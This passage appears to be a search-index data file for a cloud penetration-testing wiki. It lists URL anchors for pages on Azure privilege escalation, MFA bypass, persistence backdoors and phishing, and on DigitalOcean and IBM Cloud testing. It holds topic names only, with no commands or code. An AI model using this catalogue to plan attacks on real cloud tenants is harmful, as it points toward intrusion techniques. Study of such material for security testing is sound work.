"pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsallpropertiesupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsmembersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsdynamicmembershipruleupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#dynamic-groups-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#users","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryuserspasswordupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryusersbasicupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#conditional-access-policies--mfa-bypass","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#devices","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicesregisteredownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicesregisteredusersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicelocalcredentialspasswordread","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#bitlockerkeys","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorybitlockerkeyskeyread","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#other-interesting-permissions-todo","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#az---conditional-access-policies--mfa-bypass","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#basic-information","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#enumeration","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#conditional-acces-policies-bypasses","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#device-platforms---device-condition","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#locations-countries-ip-ranges---device-condition","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#cloud-apps","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#other-az-mfa-bypasses","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#ring-tone","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#compliant-devices","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#tooling","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#azureappssweep","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#roadrecon","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#invoke-mfasweep","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#ropci","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#donkeytoken","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#references","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#az---dynamic-groups-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#basic-information","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#example","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#references","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#az---functions-app-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#function-apps","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#bucket-readwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostlistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesfunctionslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostfunctionkeyswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostmasterkeywrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostsystemkeyswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfiglistaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfiglistaction-microsoftwebsitesconfigwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostruntimevfswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitespublishxmlaction-microsoftwebsitesbasicpublishingcredentialspolicieswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostruntimevfsread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesfunctionstokenaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesfunctionspropertiesread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesconfiglistaction-microsoftwebsitesread-microsoftwebsitesconfiglistaction-microsoftwebsitesconfigread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftappmanagedenvironmentsjoinaction-microsoftwebsitesread-microsoftwebsitesoperationresultsread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#remote-debugging","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#change-github-repo","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#az---key-vault-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#azure-key-vault","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#microsoftkeyvaultvaultswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#modify-network-restrictions","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#az---logic-apps-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#logic-apps-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftresourcessubscriptionsresourcegroupsread-microsoftlogicworkflowsread-microsoftlogicworkflowswrite--microsoftmanagedidentityuserassignedidentitiesassignaction--microsoftlogicworkflowstriggersrunaction","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftlogicworkflowswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftlogicworkflowstriggerslistcallbackurlaction","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftlogicworkflowsread-microsoftlogicworkflowswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftwebsitesread-microsoftwebsitesbasicpublishingcredentialspoliciesread-microsoftwebsiteswrite-microsoftwebsitesconfiglistaction--microsoftwebsitesstartaction","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#az---mysql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#mysql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread--microsoftdbformysqlflexibleserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite-microsoftdbformysqlflexibleserversbackupsread-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftdbformysqlflexibleserversadministratorswrite--microsoftdbformysqlflexibleserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#az---postgresql-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#postgresql-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread--microsoftdbforpostgresqlflexibleserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite-microsoftdbforpostgresqlflexibleserversbackupsread-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftdbforpostgresqlflexibleserversadministratorswrite--microsoftdbforpostgresqlflexibleserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#az---queue-storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#queue","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesread","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesprocessaction","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesaddaction","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessageswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#action-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#references","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#az---service-bus-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#service-bus","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesauthorizationruleslistkeysaction-or-microsoftservicebusnamespacesauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesauthorizationruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesqueuestopicsauthorizationruleslistkeysaction-or-microsoftservicebusnamespacesqueuestopicsauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesqueuestopicsauthorizationruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespaceswrite--microsoftservicebusnamespacesread-if-az-cli-is-used","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#send-messages-with-keys-microsoftservicebusnamespacesqueuestopicsauthorizationruleslistkeysaction-or-microsoftservicebusnamespacesqueuestopicsauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#receive-with-keys-microsoftservicebusnamespacesqueuestopicsauthorizationruleslistkeysaction-or-microsoftservicebusnamespacesqueuestopicsauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#send-messages-dataactions-microsoftservicebusnamespacesmessagessendaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#recieve-messages-dataactions-microsoftservicebusnamespacesmessagesreceiveaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#references","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#az---static-web-apps-post-exploitation","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#azure-static-web-apps","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitessnippetswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#read-configured-third-party-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#overwrite-file---overwrite-routes-html-js","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsiteslistsecretsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsiteswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitesresetapikeyaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitescreateuserinvitationaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#pull-requests","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#az---storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsregeneratekeyaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#blobs-specific-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsblobservicescontainersimmutabilitypolicieswrite--microsoftstoragestorageaccountsblobservicescontainersimmutabilitypoliciesdelete","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#file-shares-specific-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicestakeownershipaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesmodifypermissionsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesactassuperuseraction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslocaluserswrite-microsoftstoragestorageaccountslocalusersread","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslocalusersregeneratepasswordaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsrestoreblobrangesaction-microsoftstoragestorageaccountsblobservicescontainersread-microsoftstoragestorageaccountsread--microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicessharesrestoreaction--microsoftstoragestorageaccountsread","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#other-interesting-looking-permissions-todo","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#references","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#az---sql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#sql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversread--microsoftsqlserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversfirewallruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversipv6firewallruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversadministratorswrite--microsoftsqlserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversazureadonlyauthenticationswrite--microsoftsqlserversazureadonlyauthenticationsread","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversdatabasesdatamaskingpolicieswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#remove-row-level-security","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#az---virtual-desktop-privesx","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#azure-virtual-desktop-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#microsoftdesktopvirtualizationhostpoolsretrieveregistrationtokenaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#microsoftauthorizationroleassignmentsread-microsoftauthorizationroleassignmentswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#az---virtual-machines--network-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#vms--network","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesextensionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputediskswrite-microsoftnetworknetworkinterfacesjoinaction-microsoftcomputevirtualmachineswrite-microsoftcomputegalleriesapplicationswrite-microsoftcomputegalleriesapplicationsversionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesruncommandaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesloginaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesloginasadminaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftresourcesdeploymentswrite-microsoftnetworkvirtualnetworkswrite-microsoftnetworknetworksecuritygroupswrite-microsoftnetworknetworksecuritygroupsjoinaction-microsoftnetworkpublicipaddresseswrite-microsoftnetworkpublicipaddressesjoinaction-microsoftnetworknetworkinterfaceswrite-microsoftcomputevirtualmachineswrite-microsoftnetworkvirtualnetworkssubnetsjoinaction-microsoftnetworknetworkinterfacesjoinaction-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachineswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#todo-microsoftcomputevirtualmachineswacloginasadminaction","pentesting-cloud/azure-security/az-persistence/index.html#az---persistence","pentesting-cloud/azure-security/az-persistence/index.html#oauth-application","pentesting-cloud/azure-security/az-persistence/index.html#applications-and-service-principals","pentesting-cloud/azure-security/az-persistence/index.html#federation---token-signing-certificate","pentesting-cloud/azure-security/az-persistence/index.html#federation---trusted-domain","pentesting-cloud/azure-security/az-persistence/index.html#references","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#az---automation-accounts-persistence","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#storage-privesc","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#backdoor-existing-runbook","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#malware-inside-a-vm-used-in-a-hybrid-worker-group","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#custom-environment-packages","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#compromise-external-repos","pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.html#az---cloud-shell-persistence","pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.html#cloud-shell-persistence","pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.html#cloud-shell-phishing","pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.html#az---logic-apps-persistence","pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.html#logic-apps","pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.html#common-persistence-techniques","pentesting-cloud/azure-security/az-persistence/az-sql-persistence.html#az---sql-persistence","pentesting-cloud/azure-security/az-persistence/az-sql-persistence.html#sql","pentesting-cloud/azure-security/az-persistence/az-sql-persistence.html#common-persistence-techniques","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#az---queue-storage-persistence","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#queue","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#actions-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#references","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#az---vms-persistence","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#vms-persistence","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#backdoor-vm-applications-vm-extensions--images","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#backdoor-instances","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#az---storage-persistence","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#storage-privesc","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#common-tricks","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#microsoftstoragestorageaccountsblobservicescontainersupdate--microsoftstoragestorageaccountsblobservicesdeletepolicywrite","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#microsoftstoragestorageaccountsread--microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-device-registration.html#az---device-registration","pentesting-cloud/azure-security/az-device-registration.html#basic-information","pentesting-cloud/azure-security/az-device-registration.html#tpm---trusted-platform-module","pentesting-cloud/azure-security/az-device-registration.html#registering-a-device-with-sso-tokens","pentesting-cloud/azure-security/az-device-registration.html#overwriting-a-device-ticket","pentesting-cloud/azure-security/az-device-registration.html#overwrite-whfb-key","pentesting-cloud/azure-security/az-device-registration.html#references","pentesting-cloud/digital-ocean-pentesting/index.html#digital-ocean-pentesting","pentesting-cloud/digital-ocean-pentesting/index.html#basic-information","pentesting-cloud/digital-ocean-pentesting/index.html#basic-enumeration","pentesting-cloud/digital-ocean-pentesting/index.html#ssrf","pentesting-cloud/digital-ocean-pentesting/index.html#projects","pentesting-cloud/digital-ocean-pentesting/index.html#whoami","pentesting-cloud/digital-ocean-pentesting/index.html#services-enumeration","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#do---basic-information","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#main-differences-from-aws","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#hierarchy","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#user","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#team","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#project","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#permissions","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#team-1","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#roles","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#access","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#username--password-mfa","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#api-keys","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#spaces-access-keys","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#oauth-application","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#ssh-keys","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#functions-authentication-token","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#logs","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#user-logs","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#team-logs","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#references","pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.html#do---permissions-for-a-pentest","pentesting-cloud/digital-ocean-pentesting/do-services/index.html#do---services","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#do---apps","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#rce--encrypted-env-vars","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#do---container-registry","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#connection","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#do---databases","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#connections-details","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#do---droplets","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#authentication","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#firewall","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#rce","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#do---functions","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#triggers","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#do---images","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#do---kubernetes-doks","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#digitalocean-kubernetes-doks","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#connection","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#do---networking","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#domains","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#reserverd-ips","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#load-balancers","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#vpc","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#firewall","pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.html#do---projects","pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#do---spaces","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#access","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.html#do---volumes","pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.html#enumeration","pentesting-cloud/ibm-cloud-pentesting/index.html#ibm-cloud-pentesting","pentesting-cloud/ibm-cloud-pentesting/index.html#what-is-ibm-cloud-by-chatgpt","pentesting-cloud/ibm-cloud-pentesting/index.html#basic-information","pentesting-cloud/ibm-cloud-pentesting/index.html#ssrf","pentesting-cloud/ibm-cloud-pentesting/index.html#references","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.html#ibm---hyper-protect-crypto-services","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.html#basic-information","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.html#what-is-a-hardware-security-module","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#ibm---hyper-protect-virtual-server","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#basic-information","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#metadata--vpc","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#ibm-z-and-linuxone","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#linuxone-vs-x64","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#ibm---basic-information","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.htm